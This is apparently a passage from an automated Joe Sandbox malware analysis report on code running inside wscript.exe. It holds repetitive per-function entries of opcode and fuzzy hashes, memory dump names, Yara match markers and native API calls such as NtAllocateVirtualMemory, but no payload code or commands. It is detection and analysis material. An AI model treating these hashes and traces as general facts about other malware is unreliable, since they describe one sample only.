                                                                                                                                                                              • Opcode ID: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                                                                                              • Instruction ID: 4c91a7fb4248e6b69ee3863778d8a80c42dd7d43ffbb43ae57a3d693992b2547
                                                                                                                                                                              • Opcode Fuzzy Hash: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                                                                                              • Instruction Fuzzy Hash: D8316272900348BBDB31EBA4CC85FFE777CAF84744F148559B949AA190D670AE448BA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?,?,?), ref: 003794C1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                              • Opcode ID: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                                                                                              • Instruction ID: abae2e5ab535f2cfe4fcec10cba7c1779ea7ae55d72bbffd41f1b52e2efd2ba1
                                                                                                                                                                              • Opcode Fuzzy Hash: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E31B2B5A01208AFDB54DF99D881EEFB7B9EF8C314F108209F918A7340D774A851CBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?), ref: 00379619
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                              • Opcode ID: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                                                                                              • Instruction ID: dc722b09c79230f9044da836331c9b465fedb178185b57ee2ea1c9c10def65d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 2A31E5B5A00208AFDB14DF98D881EEFB7B9EF88714F008209FD18A7340D774A9118BA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00361F1E,?,0037819F,00000000,00000004,52D358EE,?,?,?,?,?,0037819F,00361F1E,0037819F,8DFFFEB0,00361F1E), ref: 00379918
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                                              • Opcode ID: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                                                                                              • Instruction ID: cfa018433297a8d4ca509dd83a5fbab744d93009d4617c430282e2b42bfd6a0f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                                                                                              • Instruction Fuzzy Hash: 16210AB5A00608ABDB14DF99DC41EEFB7B9EF89710F008209FD18A7241D774A811CBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DeleteFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                                                              • Opcode ID: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                                                                                              • Instruction ID: 73d77918e5617311994c941b6c6e9900dc9643a83f0568a88989c226259eb272
                                                                                                                                                                              • Opcode Fuzzy Hash: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                                                                                              • Instruction Fuzzy Hash: 4711A3716006187BD721EB65CC45FEF776CEF85710F008109F9086B281DBB5A81587A5
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00379717
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                              • Opcode ID: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                                                                                              • Instruction ID: 88cdeb005ef5370884120ea476c7616f212340199ae05b6cb2fafa9cd8c11cbb
                                                                                                                                                                              • Opcode Fuzzy Hash: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                                                                                              • Instruction Fuzzy Hash: 71E08C362412087BD620EA6ADC41FEF776CDFC6720F408415FA49AB251CB70B91587F1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 99f998fca2ab6335db0762973854f17e5c8b31511b66a60156a0f45672d07f26
                                                                                                                                                                              • Instruction ID: c0db5b3531dc9b65aad5a76c451c2570879225e27fc3a1a6c5d1806525b8da28
                                                                                                                                                                              • Opcode Fuzzy Hash: 99f998fca2ab6335db0762973854f17e5c8b31511b66a60156a0f45672d07f26
                                                                                                                                                                              • Instruction Fuzzy Hash: 5290023560560402F100B1588528B0610498BD0205F65C421E042556CD87D5DA5165A2
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 3f88cc9985106ac348b350dd7982c423162ec201d1e9afd067c8b7313fdba176
                                                                                                                                                                              • Instruction ID: a5c8ad6b1e93656520f15db3d02f22c5573700adb3b8786d10cc73635fa1f418
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f88cc9985106ac348b350dd7982c423162ec201d1e9afd067c8b7313fdba176
                                                                                                                                                                              • Instruction Fuzzy Hash: 62900265601600426140B158881880660499BE1305395C125E0555564C8658D9559269
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 01495d9544c197c9b26de20eab6ef24dd2274bbd88aa9c8f4b54e240e7c357ef
                                                                                                                                                                              • Instruction ID: 7b65fac3eff9389875ba1a4bad2f8fc16b58fea96039887cc2ba1d8b585096c5
                                                                                                                                                                              • Opcode Fuzzy Hash: 01495d9544c197c9b26de20eab6ef24dd2274bbd88aa9c8f4b54e240e7c357ef
                                                                                                                                                                              • Instruction Fuzzy Hash: C890022524150802F140B158C428B07004ACBD0605F55C021E0025558D8656DA6566B1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 60d30d47839fcb52508af1761b9a9218327a25e665c2f21f7ef5b9fac9958827
                                                                                                                                                                              • Instruction ID: 3fbd38631cf730d9e825afc6627a2b12637dbbcfc24db0bfcf822cded4017932
                                                                                                                                                                              • Opcode Fuzzy Hash: 60d30d47839fcb52508af1761b9a9218327a25e665c2f21f7ef5b9fac9958827
                                                                                                                                                                              • Instruction Fuzzy Hash: C790023560590012B140B158889894640499BE0305B55C021E0425558C8A54DA565361
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: d3470e90b81a6e9e735797e269833707d5676ef4f6b79c628361ed241aa139b4
                                                                                                                                                                              • Instruction ID: 681a635deabfe791c52d1cd90f7ab4011306964df7241819b372a7bf2ce00dd2
                                                                                                                                                                              • Opcode Fuzzy Hash: d3470e90b81a6e9e735797e269833707d5676ef4f6b79c628361ed241aa139b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 5590023520150402F100B598941CA4600498BE0305F55D021E5025559EC6A5D9916131
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 276bd4cd051a5bdd023aa834022ac85c5fed138bf5014d3d0f2536326e01a50d
                                                                                                                                                                              • Instruction ID: 0da4773984aea5eaf942a370d48a7b9044146d95fdceaa1dd7400cc75d154758
                                                                                                                                                                              • Opcode Fuzzy Hash: 276bd4cd051a5bdd023aa834022ac85c5fed138bf5014d3d0f2536326e01a50d
                                                                                                                                                                              • Instruction Fuzzy Hash: D290023520158802F110B158C418B4A00498BD0305F59C421E442565CD86D5D9917121
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 9d2e2b86f090c54ddd70f46a54194ec2881cedd48fd1edb197422abdf0f48205
                                                                                                                                                                              • Instruction ID: 939e46e6c7996b26333a8719832f99d01068b269c610700c424ffb959fcc53da
                                                                                                                                                                              • Opcode Fuzzy Hash: 9d2e2b86f090c54ddd70f46a54194ec2881cedd48fd1edb197422abdf0f48205
                                                                                                                                                                              • Instruction Fuzzy Hash: 9490023520150842F100B1588418F4600498BE0305F55C026E0125658D8655D9517521
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: b2bd87229556cec1de83a67a9b50ff6d92c10c88ecedf6a0761a46d7f9189716
                                                                                                                                                                              • Instruction ID: 6ef62f75cf2e3a3b1518c36594523c7050ebbc5c5a386bafdd67e38cff1de781
                                                                                                                                                                              • Opcode Fuzzy Hash: b2bd87229556cec1de83a67a9b50ff6d92c10c88ecedf6a0761a46d7f9189716
                                                                                                                                                                              • Instruction Fuzzy Hash: A4900225242541527545F1588418907404A9BE0245795C022E1415954C8566E956D621
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: b32e95311af4ceebfd8cfdda0b8c56c31dc1918fe7dd90fcb5b8a7967aac0c13
                                                                                                                                                                              • Instruction ID: 5ee2df65e0e44c74cc4d813c9151b57c845387bdf1cfaff175db23731c6a51d5
                                                                                                                                                                              • Opcode Fuzzy Hash: b32e95311af4ceebfd8cfdda0b8c56c31dc1918fe7dd90fcb5b8a7967aac0c13
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D90023520150413F111B1588518B07004D8BD0245F95C422E042555CD9696DA52A121
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 80bd511f89bbdddd7a389b7be525654e96708832f359b9d17122cb3f7b302de0
                                                                                                                                                                              • Instruction ID: 21994780fa133bde2624398fbe58e68d9cb8771553cadd8e898d722d3ac3c282
                                                                                                                                                                              • Opcode Fuzzy Hash: 80bd511f89bbdddd7a389b7be525654e96708832f359b9d17122cb3f7b302de0
                                                                                                                                                                              • Instruction Fuzzy Hash: A390022D21350002F180B158941CA0A00498BD1206F95D425E001655CCC955D9695321
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 0fec4661757e62864c5d0b5806068b3e6d1853ae0e889d6cd48429f6f2677ddf
                                                                                                                                                                              • Instruction ID: 99762d1cd62cfcef272c40125bab16b01ef0f8c755e183900e361446c7c3f45d
                                                                                                                                                                              • Opcode Fuzzy Hash: 0fec4661757e62864c5d0b5806068b3e6d1853ae0e889d6cd48429f6f2677ddf
                                                                                                                                                                              • Instruction Fuzzy Hash: FE90022530150003F140B158942CA064049DBE1305F55D021E0415558CD955D9565222
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 02381c6b7afa61a9b952a8906fc8450755ac8036ac185abc936a2f32174d13ab
                                                                                                                                                                              • Instruction ID: 7133b8f3540a2f18d23b8093ad914eac3c9b7bb58f50584fd76a2ef6690e5fea
                                                                                                                                                                              • Opcode Fuzzy Hash: 02381c6b7afa61a9b952a8906fc8450755ac8036ac185abc936a2f32174d13ab
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F90022560150502F101B1588418A16004E8BD0245F95C032E1025559ECA65DA92A131
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: cdedc403efff10094581a8a897c448b23da598cbfc40c6d268ad5a0f866132e9
                                                                                                                                                                              • Instruction ID: bfb5d542e3f125a0fedbdcbcfb4712483349c0fd52c99b814cc7253cd836d9e8
                                                                                                                                                                              • Opcode Fuzzy Hash: cdedc403efff10094581a8a897c448b23da598cbfc40c6d268ad5a0f866132e9
                                                                                                                                                                              • Instruction Fuzzy Hash: 5390026520190403F140B5588818A0700498BD0306F55C021E2065559E8A69DD516135
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: f1790ad94cc31210733e13808297d3ca248e78e41c3be87f6f76e3480d15acdc
                                                                                                                                                                              • Instruction ID: b4d8f5856478c48585bd5b44510885579fef50da87633a7fdbc840cb7fc382e1
                                                                                                                                                                              • Opcode Fuzzy Hash: f1790ad94cc31210733e13808297d3ca248e78e41c3be87f6f76e3480d15acdc
                                                                                                                                                                              • Instruction Fuzzy Hash: F5900225601500426140B168C858D064049AFE1215755C131E0999554D8599D9655665
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 0f3a473e73a1bc902e83cf65d070c7dc63a09df397422c314cb2e422a9b5b19e
                                                                                                                                                                              • Instruction ID: 3787aa0fe8572f270a894239c6d74780a55df40debaa2e3f06ff6bf1be1da6b8
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f3a473e73a1bc902e83cf65d070c7dc63a09df397422c314cb2e422a9b5b19e
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E900225211D0042F200B5688C28F0700498BD0307F55C125E0155558CC955D9615521
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: c9aad254423a1a02a47e3989b53fa9110712f323757c68fe73f84b24d44dc1a5
                                                                                                                                                                              • Instruction ID: 36d5349a522105087dfcd85d8e2d12f5367dc1c08d3ff01235f2fd82a597489e
                                                                                                                                                                              • Opcode Fuzzy Hash: c9aad254423a1a02a47e3989b53fa9110712f323757c68fe73f84b24d44dc1a5
                                                                                                                                                                              • Instruction Fuzzy Hash: E590026534150442F100B1588428F060049CBE1305F55C025E1065558D8659DD526126
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
